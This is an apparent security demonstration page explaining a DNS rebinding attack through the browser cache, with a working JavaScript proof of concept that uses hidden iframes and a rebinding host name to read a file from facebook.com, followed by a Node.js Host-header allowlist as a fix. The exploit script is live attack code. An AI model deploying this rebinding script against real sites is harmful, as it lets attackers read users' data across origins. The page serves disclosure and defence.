alf.nu / @steike

Browser cache + DNS rebinding

Alok's DNS rebinding via browser cache

Browsers protect against DNS rebinding by caching DNS entries for the entire browser session, even if the time-to-live sent by the server is short.

This demo attempts to steal a (harmless) HTML file from facebook.com.

You need to visit this page twice; try closing your browser and opening it again.

Script

// This is the script that will run inside each frame. It just fetches a file from its own host and posts the result back.

function framescript() {
  var x = new XMLHttpRequest();
  x.open('GET', '/js/blank.html?:CC=max-age=0&raw=try_again');
  x.onload = function() { parent.postMessage(x.responseText, '*'); };
  x.send();
}

window.onmessage = function(e) {
  // If we hit ourselves, the result is not interesting; ignore it.
  if (/try_again/.test(e.data)) return;
  document.getElementById('rightbox').textContent = e.data;
};

// Now create a bunch of frames. The host name will resolve to
// www.facebook.com 50% of the time and this server the rest of the time.
// If it hits this server, it will serve the script above with a long
// cache lifetime.

for (var i=0; i<20; i++) {
  var f = document.createElement('iframe');
  f.setAttribute('style', 'width:10px; height:10px; border:none');
  f.src = 'http://4s.'+i+'.c-www-facebook-com.but-50-pct.c-4i-am.4i.am' + 
          '/js/blank.html?:CC=max-age=86400&body[bgcolor=tan]&js=' + encodeURIComponent('!'+framescript+'()');
  document.getElementById('leftbox').appendChild(f);
}

(This uses the DNS thing and chargen to save some work)

Fix

Everything should verify the Host header. Everything. Also, SSL everywhere.
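Server side, "verify the Host header" means refusing to answer for any name you did not deploy under, so a rebound request (the browser still sends the attacker's host name as Host) gets nothing origin-specific. Added example, not code from the alf.nu demo: a Node.js request handler with a Host allowlist; the allowed names and port are assumed values, and the handler is meant to be passed to http.createServer.

```javascript
// Added example (not part of the original demo): Host-header allowlisting for
// a Node.js origin server as a DNS rebinding mitigation. A rebound request
// carries the attacker's host name in Host, so it never matches the allowlist.

// Names this server is willing to answer for (assumed values for the example).
const ALLOWED_HOSTS = new Set(['www.example.com', 'example.com']);

// Returns the normalised host name if the Host header is acceptable, else null.
// Handles a missing header, an optional :port, a trailing dot, upper case and
// bracketed IPv6 literals; anything else (e.g. a junk port) is rejected.
function checkHost(hostHeader, allowed = ALLOWED_HOSTS) {
  if (typeof hostHeader !== 'string' || hostHeader.length === 0) return null;
  const value = hostHeader.trim().toLowerCase();
  // "host", "host:8080" or "[::1]:8080"; the bracketed form keeps its brackets.
  const m = /^(\[[0-9a-f:.]+\]|[^:]+)(?::\d{1,5})?$/.exec(value);
  if (!m) return null;
  const host = m[1].replace(/\.$/, '');
  return allowed.has(host) ? host : null;
}

// Node-style (req, res) handler: pass to http.createServer(handler).
function handler(req, res) {
  const host = checkHost(req.headers.host);
  if (host === null) {
    // Unknown or missing Host: refuse before serving anything origin-specific.
    res.writeHead(421, { 'Content-Type': 'text/plain' });
    res.end('Misdirected Request\n');
    return;
  }
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('hello from ' + host + '\n');
}

// Convenience starter for a real server (assumed port; not called here).
function startServer(port) {
  const http = require('http');
  return http.createServer(handler).listen(port);
}
```

Do the same check in every reverse proxy and virtual host in front of the application, since a default vhost that answers for any name undoes the application-level check.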

Complaints to @steike or @steike.